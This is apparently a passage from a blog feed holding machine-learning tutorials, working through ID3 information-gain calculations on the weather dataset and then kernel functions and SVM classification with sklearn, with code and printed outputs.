    ["Sunny",    "Hot",  "High",   "Weak",   "No"],
    ["Sunny",    "Hot",  "High",   "Strong", "No"],
    ["Overcast", "Hot",  "High",   "Weak",   "Yes"],
    ["Rain",     "Mild", "High",   "Weak",   "Yes"],
    ["Rain",     "Cool", "Normal", "Weak",   "Yes"],
    ["Rain",     "Cool", "Normal", "Strong", "No"],
    ["Overcast", "Cool", "Normal", "Strong", "Yes"],
    ["Sunny",    "Mild", "High",   "Weak",   "No"],
    ["Sunny",    "Cool", "Normal", "Weak",   "Yes"],
    ["Rain",     "Mild", "Normal", "Weak",   "Yes"],
    ["Sunny",    "Mild", "Normal", "Strong", "Yes"],
    ["Overcast", "Mild", "High",   "Strong", "Yes"],
    ["Overcast", "Hot",  "Normal", "Weak",   "Yes"],
    ["Rain",     "Mild", "High",   "Strong", "No"],
]
df = pd.DataFrame(rows, columns=["Outlook", "Temp.", "Humidity", "Wind", "Decision"],
                  index=range(1, 15))
df.index.name = 'Day'
df
    Outlook Temp. Humidity Wind Decision
    Day
    1 Sunny Hot High Weak No
    2 Sunny Hot High Strong No
    3 Overcast Hot High Weak Yes
    4 Rain Mild High Weak Yes
    5 Rain Cool Normal Weak Yes
    6 Rain Cool Normal Strong No
    7 Overcast Cool Normal Strong Yes
    8 Sunny Mild High Weak No
    9 Sunny Cool Normal Weak Yes
    10 Rain Mild Normal Weak Yes
    11 Sunny Mild Normal Strong Yes
    12 Overcast Mild High Strong Yes
    13 Overcast Hot Normal Weak Yes
    14 Rain Mild High Strong No
Name      Meaning
Day       the date
Outlook   weather outlook (sunny/overcast/rain)
Temp.     temperature
Humidity  humidity
Wind      wind strength
Decision  the target/label column
(1) Computing the information entropy of the dataset

$H(D)=-\Sigma^2 _ {k=1}\frac{|C _ k|}{|D|}\log _ 2 \frac{|C _ k|}{|D|}$

    $= - \frac{|C _ {yes}|}{|D|}\log _ 2\frac{|C _ {yes}|}{|D|} - \frac{|C _ {no}|}{|D|} \log _ 2\frac{|C _ {no}|}{|D|}$

    $|D|=14,|C _ {yes}|=9, |C _ {no}|=5$

    $H(D)=-\frac{9}{14}\log _ 2 \frac{9}{14} - \frac{5}{14}\log _ 2 \frac{5}{14}= 0.940$

    D = len(df)
    C_yes = len(df[df.Decision == "Yes"])
    C_no = len(df[df.Decision == "No"])
    H_D = - (C_yes / D) * np.log2(C_yes / D) - (C_no / D) * np.log2(C_no / D)
    H_D
    0.9402859586706311
(2) Information entropy after splitting the dataset

Splitting by some attribute A:

$H(D|A)=\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}H(D _ i)=-\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}\Sigma^K _ {k=1}\frac{|D _{ik}|}{|D _ i|}\log _2\frac{|D _{ik}|}{|D _ i|}$

Splitting on attribute A reduces the uncertainty; the resulting information gain is:

    $g(D|A)=H(D)-H(D|A)$

The conditional entropy of attribute Wind:

    $H(D|Wind)=\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}H(D _ i)=\frac{|D _ {strong}|}{|D|}H(D _ {strong}) + \frac{|D _ {weak}|}{|D|}H(D _ {weak})$

The information entropy of the subset with Wind = Strong:

$H(D _ {strong})=-\Sigma^2 _ {k=1}\frac{|C _ {strong,k}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,k}|}{|D _ {strong}|}$

    $=-\frac{|C _ {strong,yes}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,yes}|}{|D _ {strong}|}-\frac{|C _ {strong,no}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,no}|}{|D _ {strong}|}$

    $=-\frac{3}{6}\log _ 2\frac{3}{6}-\frac{3}{6}\log _ 2\frac{3}{6}=1$

    D_strong = len(df[df.Wind == "Strong"])
    C_strong_yes = len(df[(df.Wind == "Strong") & (df.Decision == "Yes")])
    C_strong_no = len(df[(df.Wind == "Strong") & (df.Decision == "No")])
    H_D_strong = -(C_strong_yes / D_strong) * np.log2(C_strong_yes / D_strong) - \
    (C_strong_no / D_strong) * np.log2(C_strong_no / D_strong)
    H_D_strong
    1.0
    D_weak = len(df[df.Wind == "Weak"])
    C_weak_yes = len(df[(df.Wind == "Weak") & (df.Decision == "Yes")])
    C_weak_no = len(df[(df.Wind == "Weak") & (df.Decision == "No")])
    H_D_weak = -(C_weak_yes / D_weak) * np.log2(C_weak_yes / D_weak) - \
    (C_weak_no / D_weak) * np.log2(C_weak_no / D_weak)
    H_D_weak
    0.8112781244591328
    H_D_Wind = D_strong / D * H_D_strong + D_weak / D * H_D_weak
    H_D_Wind
    0.8921589282623617

    $g(D|Wind)=H(D)-H(D|Wind)=0.940-0.892=0.048$

    H_D - H_D_Wind
    0.04812703040826949

Similarly (the values below can be verified with the short loop that follows),

    $g(D|Outlook)=0.246$

    $g(D|Temp)=0.029$

    $g(D|Humidity)=0.151$
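These gains can be verified generically with a short loop reusing the df and H_D defined above (the helper names cond_entropy and info_gain are mine):

def cond_entropy(df, attr):
    """Conditional entropy H(D|attr) of Decision given the attribute attr."""
    h = 0.0
    for value, sub in df.groupby(attr):
        p = len(sub) / len(df)
        freqs = sub['Decision'].value_counts(normalize=True)
        h += p * -(freqs * np.log2(freqs)).sum()
    return h

def info_gain(df, attr):
    return H_D - cond_entropy(df, attr)

for attr in ["Outlook", "Temp.", "Humidity", "Wind"]:
    print(attr, round(info_gain(df, attr), 3))
# Outlook 0.246, Temp. 0.029, Humidity 0.151, Wind 0.048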

ID3 is a greedy algorithm for constructing decision trees. It originated from the Concept Learning System (CLS) and uses the rate of decrease of information entropy as the criterion for choosing test attributes: at each node it selects, among the attributes not yet used for splitting, the one with the highest information gain, and repeats the process until the resulting decision tree classifies the training examples perfectly. (ID3 algorithm, Baidu Baike)

    pip install graphviz
Collecting graphviz
  Using cached graphviz-0.20-py3-none-any.whl (46 kB)
Installing collected packages: graphviz
Successfully installed graphviz-0.20
Note: you may need to restart the kernel to use updated packages.
from PIL import Image
import matplotlib.pyplot as plt
from graphviz import Digraph

# Instantiate a Digraph (directed graph); name: output image name, format: output image format
dot = Digraph(name="test", comment="the test", format="png")

# Create the nodes; name: the node object's name, label: the text displayed on the node
dot.node(name='Outlook', shape="record", label='Outlook')
dot.node(name='Overcast', shape="plaintext", label='Overcast')
dot.node(name='Yes1', shape="plaintext", label='Yes')

dot.node(name='Humidity', shape="record", label='Humidity')
dot.node(name='Yes2', shape="plaintext", label='Yes')
dot.node(name='No1', shape="plaintext", label='No')

dot.node(name='Wind', shape="record", label='Wind')
dot.node(name='Yes3', shape="plaintext", label='Yes')
dot.node(name='No2', shape="plaintext", label='No')

# Draw the edges between nodes; label: the text shown on the edge
dot.edge('Outlook', 'Humidity', arrowhead="none", label="Sunny")
dot.edge('Humidity', 'No1', arrowhead="none", label="High")
dot.edge('Humidity', 'Yes2', arrowhead="none", label="Normal")
dot.edge('Outlook', 'Overcast', arrowhead="none")
dot.edge('Overcast', 'Yes1', arrowhead="none")
dot.edge('Outlook', 'Wind', arrowhead="none", label="Rain")
dot.edge('Wind', 'No2', arrowhead="none", label="Strong")
dot.edge('Wind', 'Yes3', arrowhead="none", label="Weak")

dot.render(filename='test', view=False)

plt.figure()
img = Image.open("test.png")
plt.imshow(img)
plt.axis('off')
plt.show()

(figure: the rendered decision tree)

The decision tree produced by the ID3 classification algorithm

I'm not very good at drawing these; this will do for now…

    ]]>
    @@ -10077,7 +10077,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8010/ - 正文

10 Spatial Transformation of Data: Kernel Function Transformation

10.1 Background

10.1.1 Hyperplanes

The defining property of a hyperplane (Hyper Plane) is that it has one degree of freedom fewer than the space containing it, i.e. it is (n-1)-dimensional

In the n-dimensional space $F^n$, a hyperplane is the subset defined by $a _ 1 x _ 1 + … + a _ n x _n =b$, where $a _ 1,…,a _ n \in F$ are constants that are not all zero

It can also be written as $\mathbf{w\cdot x}+b=0$, where $\mathbf{w}$ and $\mathbf{x}$ are n-dimensional column vectors, $\mathbf{w}=[w _ 1,w _ 2,…,w _ n]^T,\mathbf{x}=[x _ 1,x _ 2,…,x _ n]^T$

• $\mathbf{w}$ can be viewed as the hyperplane's normal vector, or as its parameters; it determines the orientation of the hyperplane

• $\mathbf{x}$ is a point on the hyperplane

• $b$ is a real number that sets the hyperplane's offset from the origin

• $\mathbf{w\cdot x}$ is the inner product of $\mathbf{w}$ and $\mathbf{x}$; the result is a scalar

• an inner product can be rewritten as a matrix product, so $\mathbf{w\cdot x}=\mathbf{w}^T\mathbf{x}$, where $\mathbf{w}^T$ is the transpose of $\mathbf{w}$

• the hyperplane divides the space into 3 parts: the hyperplane itself $\mathbf{w\cdot x}+b=0$, the upper side $\mathbf{w\cdot x}+b>0$, and the lower side $\mathbf{w\cdot x}+b<0$ (a small numeric check follows this list)
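A small numeric check of the three regions (the values of w and b are made-up examples):

import numpy as np

# The hyperplane x1 + x2 - 3 = 0 in R^2
w = np.array([1.0, 1.0])
b = -3.0

for x in [np.array([2.0, 2.0]),    # w.x + b = 1  -> upper side
          np.array([1.0, 1.0]),    # w.x + b = -1 -> lower side
          np.array([1.0, 2.0])]:   # w.x + b = 0  -> on the hyperplane
    print(x, np.dot(w, x) + b)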

10.1.2 Linear Classification

If a separating hyperplane can split two classes of samples perfectly, the samples are said to be "linearly separable"; an ellipse in 2-D space is not a separating hyperplane (it is not one-dimensional), so classes separated only by an ellipse are not linearly separable

10.1.3 Lifting the Dimension

Map the samples from the original low-dimensional input space into a high-dimensional feature space, increasing the dimensionality of the data

A problem that is not linearly separable can be handled by lifting: find a suitable mapping that turns the low-dimensional vector $\mathbf{x}$ into a high-dimensional vector $\mathbf{x}'$; then, in the high-dimensional space, take the inner product of $\mathbf{x}'$ with $\mathbf{w}$, add $b$, and obtain a separating hyperplane and a linear model for classification or regression. A problem that is nonlinearly separable in the low-dimensional input space thus becomes linearly separable in the high-dimensional feature space, as the sketch below illustrates.
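A minimal illustration with made-up 1-D data: the two classes are interleaved on the line, so no single threshold separates them, but the mapping $x \to (x, x^2)$ makes them separable by a horizontal line in 2-D:

import numpy as np

x = np.array([-2.0, -1.0, 1.0, 2.0])
labels = np.array([1, -1, -1, 1])    # outer points vs inner points: not separable in 1-D

# Lift to 2-D: x -> (x, x^2)
X_lifted = np.stack([x, x ** 2], axis=1)
print(X_lifted)
# The horizontal line x2 = 2.5 now separates the two classes:
print(np.where(X_lifted[:, 1] > 2.5, 1, -1))   # matches labels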

10.2 Introducing Kernel Functions

10.3.1 Definition of a Kernel Function

Let $\chi$ be the input space (a Euclidean space or a discrete set) and H the feature space (a Hilbert space; loosely, a higher-dimensional space). If there is a mapping $f(\mathbf{x}):\chi \to H$ such that for all $\mathbf{x},\mathbf{y}\in \chi$ the function satisfies $K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$, then $K(\mathbf{x}, \mathbf{y})$ is called a kernel function

Any positive semi-definite function can serve as a kernel function

10.3.3 Properties of Kernel Functions

• Computation stays in the original space, avoiding the "curse of dimensionality"; this greatly reduces the computational cost and handles high-dimensional inputs effectively

10.4 Commonly Used Kernel Functions

Name                 Description
Linear kernel        Applies no transformation and needs no parameters; fast. For linearly separable data; suits datasets with very many features and a comparable number of samples. One can also lift the data manually and then apply the linear kernel
Polynomial kernel    Leans linear; very well suited to image processing, and its parameters can be tuned for good results
Gaussian RBF kernel  Leans nonlinear; broadly applicable and the default kernel for SVMs; suits datasets with lower dimensionality and a moderate number of samples

10.4.1 Linear Kernel

$$K(\mathbf{x},\mathbf{y})=\mathbf{x}\cdot \mathbf{y}$$

The linear kernel is the simplest kernel; its mapping function is just $f(\mathbf{z})=\mathbf{z}$

10.4.2 Polynomial Kernel

$$K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+c \right ]^d$$

• $\gamma > 0$, usually 1/(number of classes); it rescales the inner product $(\mathbf{x}\cdot \mathbf{y})$

• c is the constant term; when c>0 the kernel is called a non-homogeneous polynomial

• d is the degree of the polynomial, usually d=2; if d is too large, the learning complexity becomes too high and overfitting is likely.

• the dimension of the feature space the polynomial kernel maps into is $C ^d _ {n+d}$, where n is the dimension of $\mathbf{x}$

A commonly used polynomial kernel:

    $K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+1 \right ]^2$

$K(\mathbf{x},\mathbf{y})=\left [ (\mathbf{x}\cdot \mathbf{y})+1\right ]^2=(\Sigma^n _ {i=1}\mathbf{x} _ i \mathbf{y} _ i + 1)^2$

    $={\color{Red}{\Sigma^n _ {i=1} \mathbf{x}^2 _ i \mathbf{y}^2 _ i}} + {\color{Blue}{\Sigma^n _ {i=2}\Sigma^{i-1} _ {j=1}(\sqrt 2 \mathbf{x} _ i\mathbf{x} _ j)(\sqrt 2 \mathbf{y} _ i\mathbf{y} _ j)}}+ {\color{Green}{\Sigma^n _ {i=1}(\sqrt 2 \mathbf{x} _ i)(\sqrt 2 \mathbf{y} _ i)}} + {\color{Purple}1}$

So $f(\mathbf{z})=\left[{\color{Red}{z^2 _ n, z^2 _ {n-1},…,z^2 _ 1}},\ {\color{Blue}{\sqrt 2 z _ n z _ {n-1},…,\sqrt 2 z _2 z _1}},\ {\color{Green}{\sqrt 2 z _ n, \sqrt 2 z _ {n-1},…,\sqrt 2 z _ 1}},\ {\color{Purple}{1}}\right]$

Using this kernel, let the vectors be $\mathbf{X}=[1, 2, 3, 4], \mathbf{Y}=[5, 6, 7, 8]$. The original input space has dimension 4; after the mapping, the feature dimension reaches $C ^4 _ {4+2}=15$. Verify that $K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$

import numpy as np


def f(Z):
    """
    The mapping function (time complexity O(n^2)).
    """
    Z1 = Z ** 2
    Z_shape = np.shape(Z)[1] - 1
    Z0 = []
    for i in range(Z_shape, 0, -1):
        for j in range(i - 1, -1, -1):
            xy = Z[0, i] * Z[0, j] * 2 ** 0.5
            Z0.append(xy)
    Z2 = np.array(Z0).reshape(1, -1)
    Z3 = Z * 2 ** 0.5
    return np.hstack((Z1, Z2, Z3, [[1]]))


X = np.array([[1, 2, 3, 4]])  # 4-dimensional row vector
Y = np.array([[5, 6, 7, 8]])
# Compute with the polynomial kernel
XY_poly = (X.dot(Y.T) + 1) ** 2
print("Result using the polynomial kernel:", XY_poly)
# Compute via the explicit mapping
X1 = f(X)
Y1 = f(Y)
print("Result using the explicit mapping:", X1.dot(Y1.T))
print("Mapped value of X:\n", X1)
print("Mapped value of Y:\n", Y1)
print("Dimension of the original input space:", np.shape(X)[1])
print("Dimension of the mapped feature space:", np.shape(X1)[1])
Result using the polynomial kernel: [[5041]]
Result using the explicit mapping: [[5041.]]
Mapped value of X:
 [[ 1.          4.          9.         16.         16.97056275 11.3137085   5.65685425  8.48528137  4.24264069  2.82842712  1.41421356  2.82842712   4.24264069  5.65685425  1.        ]]
Mapped value of Y:
 [[25.         36.         49.         64.         79.19595949 67.88225099  56.56854249 59.39696962 49.49747468 42.42640687  7.07106781  8.48528137   9.89949494 11.3137085   1.        ]]
Dimension of the original input space: 4
Dimension of the mapped feature space: 15

10.4.3 Gaussian Radial Basis Function (RBF) Kernel

$$K(\mathbf{x},\mathbf{y})=e^{-\frac{\left \| \mathbf{x}-\mathbf{y}\right \|^{2}}{2\sigma^{2}}}$$

The corresponding mapping sends the data into an infinite-dimensional space
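A quick numeric check against sklearn's implementation (note that sklearn parameterizes the kernel as $e^{-\gamma\left\|\mathbf{x}-\mathbf{y}\right\|^2}$, so $\gamma = 1/(2\sigma^2)$; the vectors and $\sigma$ below are arbitrary):

import numpy as np
from sklearn.metrics.pairwise import rbf_kernel

x = np.array([[1.0, 2.0]])
y = np.array([[3.0, 1.0]])
sigma = 1.5
gamma = 1 / (2 * sigma ** 2)

manual = np.exp(-np.sum((x - y) ** 2) / (2 * sigma ** 2))
print(manual, rbf_kernel(x, y, gamma=gamma)[0, 0])   # the two values agree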

10.6 How SVM Works

SVM = Support Vector Machine

SVC = Support Vector Classification, i.e. the support vector machine used for classification

SVR = Support Vector Regression, i.e. the support vector machine used for regression analysis

Reference: Python machine learning | an introduction to and implementation of the SVM algorithm

10.6.7 Implementing a Linearly Separable SVM

Given a training set whose positive examples are $x _ 1 = (4, 3)$ and $x _ 2 = (3, 3)$ and whose negative example is $x _ 3 = (1, 1)$, use sklearn's SVC to find the support vector machine, the number of support vectors and its parameters, and predict the points $(4, 5)$, $(0, 0)$ and $(1, 3)$.

import numpy as np
from sklearn.svm import SVC  # import the SVC model
import matplotlib.pyplot as plt
import matplotlib as mpl

# Load the data
train_x = np.array([[4, 3], [3, 3], [1, 1]])
train_y = np.array([1, 1, -1])  # the corresponding class labels
print("Training set (rightmost column is the label):\n",
      np.hstack((train_x, train_y.reshape(3, 1))))

# Instantiate and train the SVC
model = SVC(kernel="linear")  # linear kernel
model.fit(train_x, train_y)  # train the model on the training data

# Predict new points
test_x = np.array([[4, 5], [0, 0], [1, 3]])
test_y = model.predict(test_x)
print("Predicted classes for [4, 5], [0, 0], [1, 3]:", test_y)

# Attributes and return values
w = model.coef_[0]  # the normal vector w
a = -w[0] / w[1]    # slope of the separating line
b = model.intercept_
print("Support vectors:\n", model.support_vectors_)
print("Indices of the support vectors:", model.support_)
print("Number of support vectors per class:", model.n_support_)
print("Distances from the training set to the separating hyperplane:", model.decision_function(train_x))
print("Parameter (normal vector) w =", w)
print("Slope of the separating line a =", a)
print("Hyperplane intercept b:", b)  # the intercept (constant) of the hyperplane
print("Coefficients:", model.coef_)  # feature weights; only available for linear kernels
print("The hyperplane equation is {}x + {}y {} = 0".format(w[0], w[1], b[0]))

# Plot
mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
mpl.rcParams['axes.unicode_minus'] = False
plt.figure()
plt.axis("equal")
for i in range(len(train_x)):
    plt.scatter(train_x[i][0], train_x[i][1], color="red",
                marker=["x", "o"][int(train_y[i] * 0.5 + 0.5)])
for i in range(len(test_x)):
    plt.scatter(test_x[i][0], test_x[i][1], color="blue",
                marker=["x", "o"][int(test_y[i] * 0.5 + 0.5)])
plt.plot(np.linspace(0, 4, 2), a * np.linspace(0, 4, 2) - b / w[1])
plt.legend(handles=[plt.scatter(0, 0, color="red", marker="o"), plt.scatter(0, 0, color="red", marker="x"),
                    plt.scatter(0, 0, color="blue", marker="o"), plt.scatter(0, 0, color="blue", marker="x")],
           labels=['training positive', 'training negative', 'test positive', 'test negative'], loc='best')
plt.show()
Training set (rightmost column is the label):
 [[ 4  3  1]
 [ 3  3  1]
 [ 1  1 -1]]
Predicted classes for [4, 5], [0, 0], [1, 3]: [ 1 -1  1]
Support vectors:
 [[1. 1.]
 [3. 3.]]
Indices of the support vectors: [2 1]
Number of support vectors per class: [1 1]
Distances from the training set to the separating hyperplane: [ 1.5  1.  -1. ]
Parameter (normal vector) w = [0.5 0.5]
Slope of the separating line a = -1.0
Hyperplane intercept b: [-2.]
Coefficients: [[0.5 0.5]]
The hyperplane equation is 0.5x + 0.5y -2.0 = 0

(figure: training and test points with the separating line)

10.7 Nonlinear SVM and the Introduction of Kernels

Reference: Kernel functions and nonlinear support vector machines (SVM)

10.7.2 Implementing a Nonlinear SVM

(1) Import the required libraries
# Import the required libraries:
import numpy as np
from sklearn.svm import SVC
import matplotlib.pyplot as plt
from sklearn.datasets import make_circles  # generates the concentric-circles dataset
import matplotlib as mpl

mpl.rcParams['font.sans-serif'] = ['SimHei']
(2) The function plot_decision_boundary() draws the scatter plot and the support vectors
def plot_decision_boundary(model, X, y, h=0.03, draw_SV=True, title='decision_boundary'):
    """
    Plot a classified dataset and its decision regions.
    :param model: trained classifier
    :param X: feature matrix
    :param y: labels
    :param h: grid step size
    :param draw_SV: whether to mark the support vectors
    :param title: plot title
    """
    X_min, X_max = X[:, 0].min() - 1, X[:, 0].max() + 1
    y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
    # To draw the decision boundary we need a grid; np.meshgrid builds it.
    """
    Syntax: X, Y = numpy.meshgrid(x, y)
    x and y are the coordinate vectors of the grid points (not matrices);
    X and Y are the resulting coordinate matrices.
    """
    xx, yy = np.meshgrid(np.arange(X_min, X_max, h), np.arange(y_min, y_max, h))
    # Predict the class of every point in the coordinate grid
    label_predict = model.predict(np.stack((xx.flat, yy.flat), axis=1))
    # Put the result into a color plot
    label_predict = label_predict.reshape(xx.shape)  # same shape as the grid
    plt.title(title)
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(())  # hide the axes
    plt.yticks(())
    # contour() draws contour lines; contourf() fills the regions between them.
    plt.contourf(xx, yy, label_predict, alpha=0.5)  # fill each predicted class with its own color
    markers = ['x', '^', 'o']
    colors = ['b', 'r', 'c']  # blue, red, cyan
    # np.unique removes duplicate elements and returns the distinct values, sorted
    classes = np.unique(y)
    # Scatter-plot each class
    for label in classes:
        plt.scatter(X[y == label][:, 0], X[y == label][:, 1],
                    c=colors[label], s=60, marker=markers[label])
    # Mark the support vectors, one color per class
    if draw_SV:
        SV = model.support_vectors_  # get the support vectors
        n = model.n_support_[0]  # number of support vectors in the first class
        plt.scatter(SV[:n, 0], SV[:n, 1], s=15, c='black', marker='o')
        plt.scatter(SV[n:, 0], SV[n:, 1], s=15, c='g', marker='o')
    (3) 生成模拟分类数据集,并画出数据集
    """
    make_circles:
    n_samples:int,optional(默认值= 100)
    生成的总点数。如果是奇数,则内圆将比外圆具有一个点。
    shuffle:bool,optional(默认值= True)
    是否洗牌样品。
    noise:双倍或无(默认=无)
    高斯噪声的标准偏差加到数据上。
    random_state:int,RandomState 实例或 None(默认)
    确定数据集重排和噪声的随机数生成。传递一个 int,用于跨多个函数调用的可重现输出。见术语表。
    factor:0 < double < 1(默认值= .8)
    内圈和外圈之间的比例因子。
    """
    X, y = make_circles(200,factor=0.1,noise=0.1) # 产生样本点
    plt.scatter(X[y == 0, 0], X[y == 0, 1], c='b', s=20, marker = 'x') # 第一类
    plt.scatter(X[y == 1, 0], X[y == 1, 1], c='r', s=20, marker = '^') # 第二类
    plt.xticks(())
    plt.yticks(())
    plt.title('数据集')
    plt.show() # 画出数据集

    png

    (4) 通过调用 SVM 函数, 分别构造线性核函数和三阶多项式核函数 SVM, 把运算的结果用图形描绘出来
    plt.figure(figsize=(12, 10), dpi=200)
    # 使用线性核函数进行分类
    model_linear = SVC(C=1.0, kernel='linear') # 实例化,设置的核函数为线性核函数
    model_linear.fit(X, y) # 用训练集数据训练模型,和上一句配合使用

    # 画出使用线性核函数的分类边界
    plt.subplot(2, 2, 1)
    plot_decision_boundary(model_linear, X, y, title='线性核函数') # 调用画图函数
    print("采用线性核函数生成的支持向量个数:", model_linear.n_support_)

    # 使用多项式核函数进行分类
    model_poly = SVC(C=1.0, kernel='poly', degree=3, gamma="auto") # 实例化,设置的核函数为多项式核函数
    model_poly.fit(X, y) # 用训练集数据训练模型
    # 画出使用多项式核函数的分类边界
    plt.subplot(2, 2, 2)
    plot_decision_boundary(model_poly, X, y, title='多项式核函数') # 调用画图函数
    print("采用多项式函数生成的支持向量个数:", model_poly.n_support_)
    plt.show()
    采用线性核函数生成的支持向量个数:[100 100]采用多项式函数生成的支持向量个数:[100 100]

    png

    (5) 通过调用 SVC(), 分别构造 4 个高斯径向基核函数的 SVM, 对应的分别为 10, 1, 0.1, 0.01, 把运算的结果用图形描绘出来
    plt.figure(figsize=(12, 10), dpi=200)
    # enumerate() 函数用于将一个可遍历的数据对象(如列表、元组或字符串)组合为一个索引序列,
    # 同时列出数据和数据下标,一般用在 for 循环当中。
    for j, gamma in enumerate((10, 1, 0.1, 0.01)):
    plt.subplot(2, 2, j+1)
    model_rtf= SVC(C=1.0, kernel='rbf', gamma=gamma)
    model_rtf.fit(X,y) # 高斯核函数
    #调用画图函数
    plot_decision_boundary(model_rtf, X, y, title='rbf 函数,'
    '参数 gamma='+str(gamma))
    print("rbf 函数,参数 gamma=",str(gamma),"支持向量个数:",model_rtf.n_support_)
    plt.show()
    rbf 函数,参数 gamma= 10 支持向量个数:[30  7]rbf 函数,参数 gamma= 1 支持向量个数:[9 8]rbf 函数,参数 gamma= 0.1 支持向量个数:[96 96]rbf 函数,参数 gamma= 0.01 支持向量个数:[100 100]

    png

    (6) 引申
    from sklearn.model_selection import GridSearchCV

    tuned_parameters = [{'kernel': ['rbf'], 'gamma': [1, 0.1, 0.01],'C': [0.1, 1, 10]},
    {'kernel': ['linear'], 'C': [0.1, 1, 10]},
    {'kernel': ['poly'],'gamma': [1, 0.1, 0.01],
    'C': [0.1, 1, 10]}]
    """
    GridSearchCV()函数能实现自动调参, 把参数输进去, 就能给出最优的结果和参数
    https://blog.csdn.net/weixin_41988628/article/details/83098130
    """
    model_grid = GridSearchCV(SVC(), tuned_parameters, cv=5)
    model_grid.fit(X, y)
    print("The best parameters are %s with a score of %0.2f"
    % (model_grid.best_params_, model_grid.best_score_))
    The best parameters are {'C': 0.1, 'gamma': 1, 'kernel': 'rbf'} with a score of 1.00

    10.8 综合实例——利用 SVM 构建分类问题

    准备工作: 导入需要的模块

    import numpy as np
    from sklearn import svm
    from sklearn.svm import SVC # 导入 SVM 模型
    from sklearn.model_selection import train_test_split # 导入测试库
    from sklearn.datasets import load_wine # 导入 wine 数据集
    from time import time

    (1)导入数据集

    要将数据转换为 SVM 支持的数据格式: [ 1 类别标号 ] [ 特征 1 ] : [ 特征值 ] [ 特征 2 ] : [ 特征值 ]…

    sklearn 自带经典的 wine 数据集, 通过 load_wine()函数导入

    wine 数据集: https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_wine.html

    属性
    3
    每类样品[59,71,48]
    样品总数178
    维度13
    wine = load_wine()
    wine_data = wine.data
    wine_label = wine.target
    wine_data, wine_label
    (array([[1.423e+01, 1.710e+00, 2.430e+00, ..., 1.040e+00, 3.920e+00,         1.065e+03],        [1.320e+01, 1.780e+00, 2.140e+00, ..., 1.050e+00, 3.400e+00,         1.050e+03],        [1.316e+01, 2.360e+00, 2.670e+00, ..., 1.030e+00, 3.170e+00,         1.185e+03],        ...,        [1.327e+01, 4.280e+00, 2.260e+00, ..., 5.900e-01, 1.560e+00,         8.350e+02],        [1.317e+01, 2.590e+00, 2.370e+00, ..., 6.000e-01, 1.620e+00,         8.400e+02],        [1.413e+01, 4.100e+00, 2.740e+00, ..., 6.100e-01, 1.600e+00,         5.600e+02]]), array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2,        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,        2, 2]))

    (2) 数据预处理

    使用数据预处理中标准化类 StandardScaler 对数据进行标准化, 以避免数据存在严重的量纲不一致的问题

    数据的标准化(normalization)是将数据按比例缩放,使之落入一个小的特定区间。在某些比较和评价的指标处理中经常会用到,去除数据的单位限制,将其转化为无量纲的纯数值,便于不同单位或量级的指标能够进行比较和加权。

    from sklearn.preprocessing import StandardScaler

    wine_data = StandardScaler().fit_transform(wine_data) # 对数据进行标准化
    wine_data
    array([[ 1.51861254, -0.5622498 ,  0.23205254, ...,  0.36217728,         1.84791957,  1.01300893],       [ 0.24628963, -0.49941338, -0.82799632, ...,  0.40605066,         1.1134493 ,  0.96524152],       [ 0.19687903,  0.02123125,  1.10933436, ...,  0.31830389,         0.78858745,  1.39514818],       ...,       [ 0.33275817,  1.74474449, -0.38935541, ..., -1.61212515,        -1.48544548,  0.28057537],       [ 0.20923168,  0.22769377,  0.01273209, ..., -1.56825176,        -1.40069891,  0.29649784],       [ 1.39508604,  1.58316512,  1.36520822, ..., -1.52437837,        -1.42894777, -0.59516041]])

    (3) 分离数据

    将数据划分为训练集和测试集, 训练集: 测试集 = 80%: 20%

    sklearn 的 train_test_split()各函数参数含义解释(非常全)

    wine_train, wine_test, wine_train_label, wine_test_label = \
    train_test_split(wine_data, wine_label, test_size=0.2, random_state=100)

    (4) 以默认的 SVM 参数, 对训练数据集进行训练, 产生训练模型(以默认的 rbf 为例)

    time0 = time()
    model = SVC()
    model.fit(wine_train, wine_train_label)
    time1 = time()

    (5) 结果及分析

    def result_show_analyse(test,test_label):
    """
    预测结果并进行分析
    """
    from datetime import datetime

    # 1、预测结果
    print("---------测试集的结果--------")
    test_pred = model.predict(test)
    print("测试集的真实结果为:\n", test_label)
    print("测试集的预测结果为:\n", test_pred)
    # 求出预测和真实一样的数目
    true = np.sum(test_pred == test_label)
    print("预测对的结果数目为:", true)
    print("预测错的结果数目为:", test_label.shape[0] - true)
    print("训练时间:", datetime.fromtimestamp(time1-time0).strftime("%M:%S:%f"))
    # 2、结果分析,给出准确率、精确率、召回率、F1 值、Cohen’s Kappa 系数
    print("---------测试集的结果分析--------")
